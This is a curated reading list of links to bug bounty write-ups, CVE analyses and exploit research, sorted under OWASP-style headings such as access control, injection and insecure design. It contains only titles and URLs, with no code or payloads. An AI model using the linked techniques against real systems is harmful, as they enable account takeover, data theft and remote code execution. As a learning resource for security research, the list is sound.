<a href="https://supras.io/how-i-got-access-to-many-piis-through-a-source-code-leak/">-How I got access to many PIIs through a source code leak</a>
<a href="https://fourcore.io/blogs/f5-big-ip-cve-2022-1388-unauthenticated-rce-exploited-by-attackers">-F5 BIG-IP Critical Vulnerability Exploited By Attackers To Gain Unauthenticated RCE</>
<a href="https://drive.google.com/file/d/1p1tTTIjg3RoJecYSU3CetvNw6-ZZdMXn/view?usp=drivesdk">-Hacking the Cloud With SAML</a>
<a href="https://www.flashback.sh/blog/weekend-destroyer-wd-pr4100-rce">-WEEKEND DESTROYER - RCE in Western Digital PR4100 NAS</a>
<a href="https://jub0bs.com/posts/2021-01-29-great-samesite-confusion/">-The great SameSite confusion</a>
<a href="https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html">-Persistent PHP payloads in PNGs: How to inject PHP code in an image – and keep it there !</a>
<a href="https://thexssrat.medium.com/how-forgot-password-can-cost-you-your-account-2647454258da">-How “Forgot Password” can cost you your account</a>
<a href="https://rhynorater.github.io/postMessage-Braindump">-postMessage Braindump : a brief postMessage testing methodology</a>
<a href="https://sidxparab.gitbook.io/subdomain-enumeration-guide/">-Subdomain Enumeration Guide 2021 </a>
<a href="https://www.shockwave.cloud/blog/subdomain-takeover-how-a-misconfigured-dns-record-could-lead-to-a-huge-supply-chain-attack">-Subdomain Takeover: How a Misconfigured DNS Record Could Lead to a Huge Supply Chain Attack</a>
<a href="https://hector0x.medium.com/broken-authentication-through-referral-code-25cd0e8bccc2">-Full account takeover through referral code</a>
<a href="https://0xjoyghosh.medium.com/information-gathering-scanning-for-sensitive-information-reloaded-6ff3455e0d4e">-Information Gathering&scanning for sensitive information</a>
<a href="https://blog.quarkslab.com/attacking-titan-m-with-only-one-byte.html">-Attacking Pixel's Titan M with Only One Byte (CVE-2022-20233) and getting 75,000 USD bounty</a>
<a href="https://www.synacktiv.com/en/publications/cicd-secrets-extraction-tips-and-tricks.html">-CI/CD SECRETS EXTRACTION, TIPS AND TRICKS</a>
<a href="https://3bodymo.medium.com/the-easiest-2500-i-got-it-from-bug-bounty-program-8f47ea4aff22">-The easiest $2500 I got it from bug bounty program</a>
<a href="https://amineaboud.medium.com/disclose-leads-form-details-of-any-facebook-business-account-or-facebook-page-bug-bounty-7ecae6cff312">-Disclose leads form details of any Facebook Business Account or Facebook Page</a>\
<a href="https://eslam.io/posts/ejs-server-side-template-injection-rce/">-EJS, Server side template injection RCE (CVE-2022-29078) - writeup</a>
<a href="https://blog.ryotak.me/post/cdnjs-remote-code-execution-en/">-Remote code execution in cdnjs of Cloudflare</a>
<a href="https://hackerone.com/reports/1125425">-RCE via unsafe inline Kramdown options when rendering certain Wiki pages</a>
<a href="https://blog.sonarsource.com/mybb-remote-code-execution-chain">-MyBB Remote Code Execution Chain</a>
<a href="https://thehackernews.com/2022/05/critical-gems-takeover-bug-reported-in.html">-Critical Gems Takeover Bug Reported in RubyGems Package Manager</a>
<a href="https://portswigger.net/research/hunting-evasive-vulnerabilities">-Hunting evasive vulnerabilities</a>
<a href="https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067">-Enter "Sandbreak" - Vulnerability In vm2 Sandbox Module Enables Remote Code Execution (CVE-2022-36067)</a>
<a href="https://hackerone.com/reports/928255">-Ability To Delete User(s) Account Without User Interaction</a>
<a href="http://ysamm.com/?p=603">-URLs in img tag aren’t safely embedded. ($500)</a>
<a href="https://saajan.bhujel.cyou/blog/web/2022-10-16-how-i-got-10000-from-github-for-bypassing-filtration-of-html-tags">-How I Got $10,000 From GitHub For Bypassing Filtration oF HTML tags</a>
<a href="https://blog.assetnote.io/2021/08/29/exploiting-graphql/">-Exploiting GraphQL</a>
<a href="https://hackerone.com/reports/1091303">-Low privilege user can read POS PINs via graphql and elevate his privilege</a>
<a href="https://blog.doyensec.com/2021/05/20/graphql-csrf.html">-That single GraphQL issue that you keep missing</a>
<a href="https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/">-CVE-2021-4191: GitLab GraphQL API User Enumeration (FIXED)</a>
<a href="https://github.com/gsmith257-cyber/GraphCrawler">-GraphQL automated security testing toolkit </a>
<a href="https://rashahacks.com/idor-in-graphql-query-leaking-private-photos-of-a-million-app-2c12c7e9dea7">-IDOR in GraphQL Query Leaking Private Photos of a Million $ App</a>
# OWASP Top 10 Web-Application Issues (Updated)
## Broken Access Control
<a href="https://hx01.me/Abusing_Data_Protection_Laws_For_D0xing_and_Account_Takeovers.pdf">-Hx01 Abusing Data Protection Laws For D0xing & Account Takeovers</a>
<a href="http://ysamm.com/?p=606">-Access employees files in internal CDNs/ Access users modified/deleted content.($12500)</a>
<a href="https://vijetareigns.medium.com/forced-browsing-to-access-admin-panel-214a7defa2a5">-Forced Browsing to Access Admin Panel</a>
<a href="https://medium.com/@botami143/i-found-idor-vulnerability-at-microsoft-subdomain-b89b8777bf8d">-I found IDOR Vulnerability at Microsoft Subdomain</a>
<a href="https://medium.com/@tusharsaini484/how-i-found-an-idor-that-led-to-sensitive-information-leak-6055bb121f8">-How I found an IDOR that led to sensitive information leak?</a>
<a href="https://medium.com/@gonzalocarrascosec/fuzzing-idor-admin-takeover-5343bb8f436e">-Fuzzing + IDOR = Admin TakeOver</a>
<a href="https://shahjerry33.medium.com/account-takeover-inside-the-tenant-6101a3cafbee">-Account Takeover - Inside The Tenanth</a>
<a href="https://blog.intigriti.com/2023/02/13/file-attachments-size-does-matter/">Helping secure BNB Chain through responsible disclosure</a>
<a href="https://infosecwriteups.com/how-i-was-able-to-takeover-accounts-in-websites-deal-with-github-as-a-sso-provider-294290358e0c">-How I was able to take over accounts in websites deal with Github as an SSO provider</a>
<a href="https://medium.com/@gonzxph/account-takeover-worth-of-2500-e643661f94e9">-Account Takeover Worth of $2500</a>
<a href="https://0xmaruf.medium.com/firing-8-account-takeover-methods-77e892099050">-Firing 8 Account Takeover Methods</a>
<a href="https://r0ckinxj3.wordpress.com/2021/10/24/a-7500-google-sites-idor/">-A 7500$ Google sites IDOR</a>
<a href="https://salt.security/blog/traveling-with-oauth-account-takeover-on-booking-com">-Traveling with OAuth - Account Takeover on Booking.com</a>
<a href="https://agnihackers.medium.com/otp-bypass-through-response-manipulation-beeb467359d8">-OTP Bypass Through Response Manipulation</a>
<a href="https://ysamm.com/?p=783">-Account Takeover in Canvas Apps served in Comet due to failure in Cross-Window-Message Origin validation</a>
<a href="https://sagarsajeev.medium.com/unsubscribe-any-users-e-mail-notifications-via-idor-2c2e05b79dac">-Unsubscribe any user’s e-mail notifications via IDOR</a>
<a href="https://infosecwriteups.com/idor-leads-to-leak-private-details-866563365490">-IDOR leads to leak Private Details</a>
<a href="https://bhansalipratish.medium.com/how-i-found-my-first-bug-idor-9c4e52584454">-How I found my first bug (IDOR)</a>
<a href="https://medium.com/@h4x0r_dz/23000-for-authentication-bypass-file-upload-arbitrary-file-overwrite-2578b730a5f8">-23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite</a>
<a href="https://adityashende17.medium.com/idor-to-information-disclosure-admin-account-takeover-6aa96798c70b">-IDOR to information disclosure + Admin Account Takeover</a>
<a href="https://junoonbro.medium.com/idors-how-to-find-idors-in-ecommerce-sites-d112bd946fcf">-$$$$ IDOR’s — How to find IDORs in Ecommerce sites?</a>
<a href="http://ysamm.com/?p=783">-ATO in Canvas Games due to weak cross window message Origin validations ($62,500)</a>
<a href="https://akash-venky091.medium.com/otp-bypassing-and-vulnerabilities-from-e-mail-fields-a5c326efa605">-OTP Bypassing and Vulnerabilities from E-Mail fields.</a>
<a href="https://kuldeep.io/posts/path-traversal-paradise/">-Path Traversal Paradise</a>
<a href="https://sysdig.com/blog/cve-2022-42889-text4shell/">-Detecting and mitigating CVE-2022-42889 a.k.a. Text4shell</a>
<a href="https://medium.com/@divyanshsharma2401/bypassing-waf-for-2222-f99b80cfdb9b">-Bypassing WAF for $2222</a>
<a href="https://yilmazcanyigit.medium.com/cve-2019-6238-apple-xar-directory-traversal-vulnerability-9a32ba8b3b7d">-CVE-2019–6238: Apple XAR directory traversal vulnerability</a>
<a href="https://medium.com/@manavbankatwala29/unique-rate-limit-bypass-worth-1800-6e2947c7d972">-Unique Rate limit bypass worth 1800$</a>
<a href="https://encodedguy.medium.com/600-for-idor-file-or-folder-download-243166452dad">-$600 for IDOR (File or Folder Download)</a>
<a href="https://amit-lt.medium.com/a-story-of-idor-which-leads-to-privacy-violation-78c1b4c710fb">-A Story of IDOR which leads to privacy violation…$$$</a>
<a href="https://hopesamples.blogspot.com/2022/09/idor-leads-to-removing-members-from-any.html">-IDOR leads to removing members from any Google Chat Space</a>
<a href="https://n1ghtmar3.medium.com/how-i-found-my-first-idor-in-hackerone-5d5f17bb431">-How I found my first IDOR in HackerOne</a>
<a href="https://asterfiester.medium.com/5000-google-idor-vulnerability-writeup-c7b45926abe9">-$5000 Google IDOR Vulnerability Writeup</a>
<a href="https://snapsec.co/blog/2021/09/25/Attacking-Access-Control-Models-In-Modern-Web-Applications.html">-Attacking Access Control Models In Modern Web Applications</a>
<a href="https://github.blog/2023-03-03-github-security-lab-audited-datahub-heres-what-they-found/">-GitHub Security Lab audited DataHub: Here’s what they found</a>
<a href="https://medium.com/@mehedishakeel/improper-access-control-my-third-finding-on-hackerone-1455e95b6c8c">-Improper Access Control — My Third Finding on Hackerone!</a>
<a href="https://medium.com/@rajeevranjancom/cross-site-request-forgery-csrf-attack-6949edb9e405">-Cross site request forgery (CSRF) attack</a>
<a href="https://psfauzi.medium.com/how-i-get-1350-from-idor-just-less-1-hours-7496bab1a914">-How I Get $1350 From IDOR Just Less 1 hours</a>
<a href="https://junoonbro.medium.com/how-i-earned-9000-with-privilege-escalations-b187d1f8f4fe">-How I earned $9000 with Privilege escalations</a>
<a href="https://psfauzi.medium.com/how-i-get-1350-from-idor-just-less-1-hours-7496bab1a914">-How I Get $1350 From IDOR Just Less 1 hours</a>
<a href="https://hackerone.com/reports/1372216">-IDOR in "external status check" API leaks data about any status check on the instance</a>
<a href="https://medium.com/@nvmeeet/4300-instagram-idor-bug-2022-5386cf492cad">-4300$ Instagram IDOR Bug (2022)</a>
<a href="https://medium.com/@webresearcher007/how-i-was-able-to-delete-any-users-oauth-connections-via-idor-bf3a8e8e2269">-How I was able to delete any users’ OAUTH connections via IDOR</a>
<a href="https://medium.com/@tobydavenn/how-i-was-able-to-takeover-any-users-account-on-a-major-telecoms-website-2cd5aa43e3d6">-How I was able to takeover any users account on a major telecoms website</a>
<a href="https://www.cobalt.io/blog/cobalt-pentest-case-study-oauth-redirect-to-account-takeover">-Cobalt Pentest Case Study: OAuth Redirect to Account Takeover</a>
<a href="https://aidilarf.medium.com/idor-via-get-request-which-can-sold-all-user-products-2f5bc3ea1650">-IDOR via GET Request which can SOLD all User Products</a>
<a href="https://snapsec.co/blog/CORS-Misconfigrations/">-CORS Misconfigurations</a>
<a href="https://youtu.be/5guMYiQrnUo">-Shopify Account Takeover $22,500 Bug Bounty</a>
<a href="https://blog.intigriti.com/2021/10/13/bug-bytes-142-weird-google-bugs-saml-padding-oracle-apache-path-traversal-continued/">-Weird Google bugs, SAML padding Oracle & Apache path traversal continued</a>
<a href="https://www.intruder.io/research/practical-http-header-smuggling">-Practical HTTP Header Smuggling: Sneaking Past Reverse Proxies to Attack AWS and Beyond</a>
<a href="https://www.youtube.com/watch?v=FzT3Z7tgDSQ">-$5,000 YouTube IDOR - Bug Bounty Reports Explained </a>
## Cryptographic Issues / Bugs
<a href="https://i.blackhat.com/USA-22/Wednesday/us-22-Kettle-Browser-Powered-Desync-Attacks.pdf">-Browser-Powered Desync Attacks -> A New Frontier in HTTP Request Smuggling</a>
<a href="https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning">-Making HTTP header injection critical via response queue poisoning</a>
<a href="https://mouha.be/sha-3-buffer-overflow/">-SHA-3 Buffer Overflow</a>
<a href="https://medium.com/numen-cyber-labs/analysis-and-summary-of-tcp-ip-protocol-remote-code-execution-vulnerability-cve-2022-34718-8fcc28538acf">-TCP/IP Vulnerability CVE-2022–34718 PoC Restoration and Analysis</a>
<a href="https://securitylabs.datadoghq.com/articles/openssl-november-1-vulnerabilities/">-The OpenSSL punycode vulnerability (CVE-2022-3602): Overview, detection, exploitation, and remediation</a>
## Injection Issues / Bugs
<a href="https://m7-arman.medium.com/host-header-injection-lead-to-account-takeover-2f025a645d13">-Host Header Injection Lead To Account Takeover</a>
<a href="https://hackerone.com/reports/1196124">-Regular Expression Injection</a>
<a href="https://sudhanshur705.medium.com/exploring-the-world-of-esi-injection-b86234e66f91">-Exploring the World of ESI Injection</a>
<a href="https://medium.com/@sicks3c/tale-of-xss-in-angular-c5c057a56156">-Tale of XSS in Angular</a>
<a href="https://labs.guard.io/xss-vulnerability-found-in-connectwise-remote-access-platform-with-great-potential-for-misuse-by-scammers-a0773da2aacf">-XSS Vulnerability Found in ConnectWise Remote Access Platform With Great Potential For Misuse by Scammers</a>
<A href="https://medium.com/@sid0krypt/vue-js-reflected-xss-fae04c9872d2">-Vue JS Reflected XSS</a>
<a href="https://securitylab.github.com/advisories/GHSL-2022-059_GHSL-2022-060_Owncloud_Android_app/">-SQL injection vulnerabilities in Owncloud Android app - CVE-2023-24804, CVE-2023-23948</a>
<a href="https://karmainsecurity.com/exploiting-an-nday-vbulletin-php-object-injection">-Exploiting an N-day vBulletin PHP Object Injection Vulnerability</a>
<a href="https://portswigger.net/research/finding-dom-polyglot-xss-in-paypal-the-easy-way">Finding DOM Polyglot XSS in PayPal the Easy Way </a>
<a href="https://lethanhphuc-pk.medium.com/bugbounty-xss-with-markdown-exploit-fix-on-opensource-1baecebe9645">-XSS with Markdown — Exploit & Fix on OpenSource</a>
<a href="https://bugcrowd.com/disclosures/aac249ea-fe92-4b43-98e9-dda021c0ff4d/postmessage-xss-in-tesla-payment-page">-postMessage XSS in Tesla Payment page </a>
<a href="https://medium.com/@_ip_/2-3-xss-through-the-front-door-gitlab-fc4b6799e743">-XSS Through The Front-Door @ GitLab</a>
<a href="https://portswigger.net/daily-swig/html-parser-bug-triggers-chromium-xss-security-flaw">-HTML parser bug triggers Chromium XSS security flaw</a>
<a href="https://www.trustedsec.com/blog/scraping-login-credentials-with-xss/">-SCRAPING LOGIN CREDENTIALS WITH XSS </a>
<a href="https://medium.com/@haroonhameed_76621/a-775-worth-of-cookies-reflected-dom-based-xss-bug-bounty-poc-3e7720c78fbe">-A $$$ worth of cookies! | Reflected DOM-Based XSS | Bug Bounty POC</a>
<a href="https://infosecwriteups.com/how-i-was-able-to-find-50-cross-site-scripting-xss-security-vulnerabilities-on-bugcrowd-public-ba33db2b0ab1">-How I was able to find 50+ Cross-site scripting (XSS) Security Vulnerabilities on Bugcrowd Public Program</a>
<a href="https://portswigger.net/daily-swig/email-platform-zimbra-issues-hotfix-for-xss-vulnerability-under-active-exploitation">-Email platform Zimbra issues hotfix for XSS vulnerability under active exploitation</a>
<a href="https://omar0x01.medium.com/cve-2022-38627-a-journey-through-sqlite-injection-to-compromise-the-whole-enterprise-building-15cebd072ed6">-CVE-2022-38627: A journey through SQLite Injection to compromise the whole enterprise building</a>
<a href="https://hackerone.com/reports/1196958">-Clipboard DOM-based XSS</a>
<a href="https://medium.com/@armaanpathan/exploiting-dom-based-xss-via-misconfigured-postmessage-function-bfc794969a0a">-Exploiting DOM Based XSS via Misconfigured postMessage() Function</a>
<a href="https://medium.com/@tobydavenn/stored-xss-to-other-users-via-messages-e033239821b5">-Stored XSS To Other Users Via Messages</a>
<a href="https://sl4x0.medium.com/how-i-found-xss-on-admin-page-without-login-fe165a5f89c2">-How I found XSS on Admin Page without login!</a>
<a href="https://0u.ma/5">-Cache Poisoning via SelfXSS + Path Parameter</a>
<a href="https://godiego.tech/posts/STO/">-Subdomain Takeover in Azure: making a PoC</a>
<a href="https://c0nqr0r.medium.com/error-based-sql-injection-with-waf-bypass-manual-exploit-100-bab36b769005">-Error based SQL Injection with WAF bypass manual Exploit 100%</a>
<a href="https://medium.com/@abhijeetbiswas_/xss-cross-site-scripting-via-x-forwarded-host-header-20be114d4254">-XSS via X-Forwarded-Host header</a>
<a href="https://thevillagehacker.medium.com/time-based-sql-injection-to-dumping-the-database-da0e5bcaa9df">-Time-Based SQL Injection to Dumping the Database</a>
<a href="https://medium.com/@siratsami71/1500-worth-slack-vulnerability-bypass-invite-accept-process-8204e5431d52">-[1500$ Worth — Slack] vulnerability, bypass invite accept process</a>
<a href="https://medium.com/@omidxrz/command-injection-by-changing-the-logo-2d730887ab6c">-The Tale of a Command Injection by Changing the Logo</a>
<a href="https://hackerone.com/reports/1367642">-Reflected Cross Site Scripting (XSS) on one.newrelic.com</a>
<a href="https://portswigger.net/research/new-xss-vectors">-New XSS vectors</a>
<a href="https://medium.com/@marvelmaniac/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8">-The most underrated injection of all time — CYPHER INJECTION. How I found and exploited it && 2000$ bounty !</a>
<a href="https://hackerone.com/reports/1558010">-Blind XSS in app.pullrequest.com/████████ via /reviews/ratings/{uuid}</a>
<a href="https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/">-Hacking Swagger-UI - from XSS to account takeovers</a>
<a href="https://medium.com/@M0X0101/how-i-was-able-to-steal-users-credentials-via-swagger-ui-dom-xss-e84255eb8c96">-How I was able to steal users credentials via Swagger UI DOM-XSS</a>
<a href="https://spaceraccoon.dev/analyzing-clipboardevent-listeners-stored-xss/">-I Hope This Sticks: Analyzing ClipboardEvent Listeners for Stored XSS</a>
<a href="https://hackerone.com/reports/1212067">-Stored XSS in markdown via the DesignReferenceFilter</a>
<a href="https://hackerone.com/reports/977697">-Stored-XSS in merge requests</a>
<a href="https://apth3hack3r.medium.com/xss-through-base64-encoded-json-4b0d96e5ccd4">-XSS through base64 encoded JSON </a>
<a href="https://medium.com/@bored.engineer/xss-on-account-leagueoflegends-com-via-easyxdm-2016-75bcf9d582b5">-XSS on account[dot]leagueoflegends[dot]com via easyXDM [2016]</a>
<A href="https://security.lauritz-holtmann.de/post/xss-ato-gadgets/">-SSO Gadgets: Escalate (Self-)XSS to ATO</a>
<a href="https://svennergr.github.io/writeups/google/ads_dom_xss/">-Stumbling across a DOM XSS on google.com</a>
<a href="https://threatpost.com/xss-bug-seopress-wordpress-plugin/168702/">-XSS Bug in SEOPress WordPress Plugin Allows Site Takeover</a>
<a href="https://medium.com/tenable-techblog/stored-xss-to-rce-chain-as-system-in-manageengine-servicedesk-plus-493c10f3e444">-Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus</a>
<a href="https://blog.nietaanraken.nl/posts/github-pages-command-injection/">-Command Injection in the GitHub Pages Build Pipeline</a>
<a href="https://hackerone.com/reports/1504410">-XSS via Mod Log Removed Post</a>
<a href="https://m3ez.medium.com/reflected-xss-leads-to-3-000-bug-bounty-rewards-from-microsoft-forms-efe34fc6b261">-Reflected XSS Leads to 3,000$ Bug Bounty Rewards from Microsoft Forms</a>
<a href="https://palant.info/2022/08/24/attack-surface-of-extension-pages/">-Attack surface of extension pages</a>
<a href="https://hackerone.com/reports/1481207">-Stored XSS in Notes (with CSP bypass for gitlab.com)</a>
<a href="https://medium.com/@fpatrik/how-i-found-an-xss-vulnerability-via-using-emojis-7ad72de49209">-How I found an XSS vulnerability via using emojis</a>
<a href="https://jasminderpalsingh.info/stored-xss-in-google-doubleclick-studio-google-research-grant/">-Stored XSS in Google Doubleclick Studio</a>
<a href="https://0xkasper.com/articles/moodle-sql-injection-broken-access-control">-Moodle: Blind SQL Injection (CVE-2021-36393) and Broken Access Control (CVE-2021-36397)</a>
<a href="https://eslam3kl.medium.com/sql-injection-at-spotify-d19e0861ddf0">-SQL Injection at Spotify</a>
<a href="https://omar0x01.medium.com/orange-arbitrary-command-execution-75ba7f283d53">-Orange Arbitrary Command Execution</a>
<a href="https://omar0x01.medium.com/how-i-found-multiple-sql-injections-in-5-minutes-in-bug-bounty-40155964c498">-How I Found Multiple SQL Injections in 5 Minutes in Bug Bounty</a>
<a href="https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4">-Finding an unseen SQL Injection by bypassing escape functions in mysqljs/mysql</a>
<a href="https://blog.sonarsource.com/wordpress-stored-xss-vulnerability">-WordPress 5.8.2 Stored XSS Vulnerability</a>
<a href="https://octagon.net/blog/2022/03/02/apache-jspwiki-preauth-xss-to-ato/">-CVE-2022-24948: Apache JSPWiki preauth Stored XSS to ATO</a>
<a href="https://sapt.medium.com/stored-xss-non-privileged-user-to-anyone-using-qr-code-dfeb0bd98a5">-Stored XSS: Non-Privileged User to Anyone Using QR Code</a>
<a href="https://jlajara.gitlab.io/Javascript_Hoisting_in_XSS_Scenarios">-Javascript Hoisting in XSS Scenarios</a>
<a href="https://mtechghost.medium.com/stored-xss-vulnerability-in-microsoft-booking-e593de3344e0">-Stored XSS vulnerability in Microsoft booking</a>
<a href="https://palisade.consulting/blog/rarible-vulnerability">-Palisade identifies Wormable Cross-Site Scripting Vulnerability affecting Rarible’s NFT Marketplace</a>
<a href="https://www.gosecure.net/blog/2022/07/13/tableau-server-leaks-sensitive-information-from-reflected-xss/">-Tableau Server Leaks Sensitive Information From Reflected XSS</a>
<a href="https://sanderwind.medium.com/unleashing-the-power-of-css-injection-the-access-key-to-an-internal-api-789b166d0527">-Unleashing the power of CSS injection: The access key to an internal API</a>
<a href="https://github.com/lleavesl/CVE-2021-26084">-CVE-2021-26084,Atlassian Confluence OGNL</a>
<a href="https://ian.sh/redash">-Exploiting Redash instances with CVE-2021-41192</a>
<a href="https://medium.com/@hamzadzworm/5000-for-apple-stored-xss-and-another-blind-xss-still-under-review-e9f6f5a76eb1">-5000$ for Apple Stored Xss And Another Blind Xss Still under review</a>
<a href="https://hackerone.com/reports/1424094">-Web Cache Poisoning leads to Stored XSS</a>
<a href="https://hackerone.com/reports/1322104">-XSS on tiktok.com</a>
<a href="http://ysamm.com/?p=779">-DOM-XSS in Instant Games due to improper verifications ($62,500?)</a>
<a href="https://hackerone.com/reports/1087061">-Stored-XSS on wiki pages</a>
<a href="https://hackerone.com/reports/1280002">-Stored XSS via Mermaid Prototype Pollution vulnerability</a>
<A href="https://fluidattacks.com/blog/uxss-to-account-takeover-rushbet/">-UXSS to Account Takeover in Rushbet</a>
<a href="https://youtu.be/RtJXgGb3uJ0">-Stored XSS in Wordpress.com</a>
<a href="https://maordayanofficial.medium.com/stored-xss-at-trello-com-ef2e3d1ed24b">-Stored XSS at Trello</a>
<a href="https://medium.com/@mohameddhanish98/a-story-of-dom-xss-852b6ed3bb5f">-A Story of DOM XSS</a>
<a href="https://ag3n7.medium.com/got-another-xss-using-double-encoding-e6493a9f7368">-Got Another XSS using Double Encoding</a>
<a href="https://prashantbhatkal2000.medium.com/svg-based-stored-xss-ee6e9b240dee">-SVG based Stored XSS</a>
<a href="https://portswigger.net/daily-swig/google-roulette-developer-console-trick-can-trigger-xss-in-chromium-browsers">-Google Roulette: Developer console trick can trigger XSS in Chromium browsers</a>
<a href="https://medium.com/@youghourtaghannei/postmessage-xss-vulnerability-on-private-program-18e773e1a1ba">-PostMessage Xss vulnerability on private program</a>
<a href="https://m3ez.medium.com/how-i-found-dom-based-xss-on-microsoft-msrc-and-how-they-fixed-it-8b71a6020c82">-How I found DOM-Based XSS on Microsoft MSRC and How they fixed it</a>
<a href="https://ysamm.com/?p=779">-DOM-XSS in Instant Games due to improper verification of supplied URLs</a>
<a href="https://medium.com/@haroonhameed_76621/winning-qr-with-dom-based-xss-bug-bounty-poc-4b4048cf285d">-Winning QR with DOM-Based XSS | Bug Bounty POC</a>
<a href="https://hector0x.medium.com/easy-sqli-in-amazon-subsidiary-using-sqlmap-ff469013671b">-Easy SQLi in Amazon subsidiary using Sqlmap</a>
<a href="https://y000o.medium.com/fun-sql-injection-mod-security-bypass-644b54b0c445">-Fun sql injection — mod_security bypass/a>
<a href="https://www.verizonmedia.com/insights/promotion-public-004">SQL Injection Bugs on All Verizon Media Assets</a>
<a href="https://www.techncyber.com/2022/07/sql-injection-at-authorization-token.html">-Exploiting SQL Injection at Authorization token</a>
<a href="https://blog.trailofbits.com/2022/10/25/sqlite-vulnerability-july-2022-library-api/">-Stranger Strings: An exploitable flaw in SQLite</a>
<a href="https://medium.com/@touseefgul/a-500-sql-injection-in-ikea-es-my-first-finding-on-hackerone-cf15c4ecd5a6">-A 500$ SQL Injection Bug in .IKEA.es — My First Finding on Hackerone!</a>
<a href="https://www.varonis.com/blog/zendesk-sql-injection-and-access-flaws">-Varonis Threat Labs Discovers SQLi and Access Flaws in Zendesk</a>
<a href="https://research.nccgroup.com/2022/12/05/exploring-prompt-injection-attacks/">-Exploring Prompt Injection Attacks</a>
<a href="https://research.nccgroup.com/2022/12/22/puckungfu-a-netgear-wan-command-injection/">-Puckungfu: A NETGEAR WAN Command Injection</a>
## Insecure Design
<a href="https://ahmed8magdy.medium.com/file-upload-to-rce-538bb4128062">-File Upload to RCE</a>
<a href="https://sm4rty.medium.com/hunting-for-bugs-in-file-upload-feature-c3b364fb01ba">-Hunting for Bugs in File Upload Feature</a>
<a href="https://amakki.me/how-i-made-15k-from-remote-code-execution-vulnerability-2e1b14b3902a">-How i made 15k$ from Remote Code Execution Vulnerability</a>
<a href="https://portswigger.net/daily-swig/http-request-smuggling-bug-patched-in-mitmproxy">-HTTP request smuggling bug patched in mitmproxy</a>
<a href="https://hackerone.com/reports/1372667">-Able to steal bearer token from deep link</a>
<a href="https://medium.com/@shabarkin/unsafe-content-loading-electron-js-76296b6ac028">-Unsafe content loading [Electron JS]</a>
<a href="https://fluidattacks.com/blog/account-takeover-kayak/">-Account Takeover in KAYAK</a>
<a href="https://joonas.fi/2021/08/saml-is-insecure-by-design/">-SAML is insecure by design</a>
<a href="https://blog.trailofbits.com/2023/02/21/vscode-extension-escape-vulnerability/?utm_source=hivefive&utm_medium=email">-Escaping misconfigured VSCode extensions</a>
<a href="https://medium.com/@Mrcyberwarrior/exploiting-activity-in-medium-android-app-e2e6f3553eef">-Trigger custom URL in Medium Android app</a>
<a href="https://hackerone.com/reports/1167753">-Add new managed stores without permission</a>
<a href="https://mayank-01.medium.com/hacking-microservices-for-fun-and-bounty-5cc302769e94">-Hacking Microservices For Fun and Bounty</a>
<a href="https://medium.com/@_ip_/3-3-cache-poisoning-lateral-movement-gitlab-9c6288708576">-Cache Poisoning & Lateral Movement @ GitLab</a>
<a href="https://snapsec.co/blog/Attacking-File-Uploads-in-Modern-Web-Apps/">-Attacking File Uploads in Modern Web Applications</a>
<a href="https://medium.com/@vflexo/full-account-takeover-via-open-redirection-41c167db46">-Full Account Takeover via Open Redirection </a>
<a href="https://medium.com/@thehemdeep/bypassing-file-upload-restriction-using-magic-bytes-eb13e801f264">-Bypassing File Upload Restriction using Magic Bytes</a>
<a href="https://akashhamal0x01.medium.com/design-flaw-a-tale-of-permanent-dos-a9ef05181083">-Design Flaw : A Tale of Permanent DOS (Informative -> Triaged)</a>
<a href="https://medium.com/@aditya043k/oauth-misconfiguration-leads-to-full-account-takeover-d93c0d0fb66c">-OAUTH Misconfiguration leads to Full Account Takeover</a>
<a href="https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/">-Hijacking GitHub Repositories by Deleting and Restoring Them</a>
<a href="https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html">-Exploiting CVE-2022-42703 - Bringing back the stack attack</a>
<a href="https://medium.com/pentesternepal/two-factor-authentication-bypass-on-facebook-3f4ac3ea139c">-Two Factor Authentication Bypass On Facebook</a>
<a href="https://research.nccgroup.com/2022/12/19/meshyjson-a-tp-link-tdpserver-json-stack-overflow/">-MeshyJSON: A TP-Link tdpServer JSON Stack Overflow</a>
<a href="https://nmochea.medium.com/arbitrary-file-corruption-end-to-end-encrypted-messaging-application-674963dceef8">-Arbitrary File Corruption: End - to - End Encrypted Messaging Application</a>
<a href="https://redcanary.com/blog/fuzzing/">-Fuzzing Golang msgpack for fun and panic</a>
<a href="https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/">-Hacking a Bank by Finding a 0day in DotCMS</a>
<a href="https://medium.com/@arshiadev/paramspider-lead-to-find-sqli-vulnerability-995f6159564c">-Paramspider lead to find SQLI vulnerability</a>
<a href="https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html">-Let's Dance in the Cache - Destabilizing Hash Table on Microsoft IIS!</a>
<a href="https://www.legitsecurity.com/blog/artifact-poisoning-vulnerability-discovered-in-rust">-Novel Pipeline Vulnerability Discovered; Rust Found Vulnerable</a>
<a href="https://erasec.be/blog/client-side-path-manipulation/">-Practical Example Of Client Side Path Manipulation</a>
<a href="https://portswigger.net/daily-swig/finding-nbsp-the-next-log4j-nbsp-openssfs-brian-behlendorf-on-pivoting-to-a-risk-centred-view-of-open-source-development">-Finding the next Log4j – OpenSSF’s Brian Behlendorf on pivoting to a ‘risk-centred view’ of open source development</a>
<a href="https://ysamm.com/?p=777">-Account takeover of Facebook/Oculus accounts due to First-Party access_token stealing</a>
<a href="https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b">-Laravel 8.x image upload bypass</a>
<a href="https://medium.com/@bxmbn/how-i-made-15-000-by-hacking-caching-servers-part-1-5541712a61c3">-How I Made $16,500 Hacking CDN Caching Servers — Part 1</a>
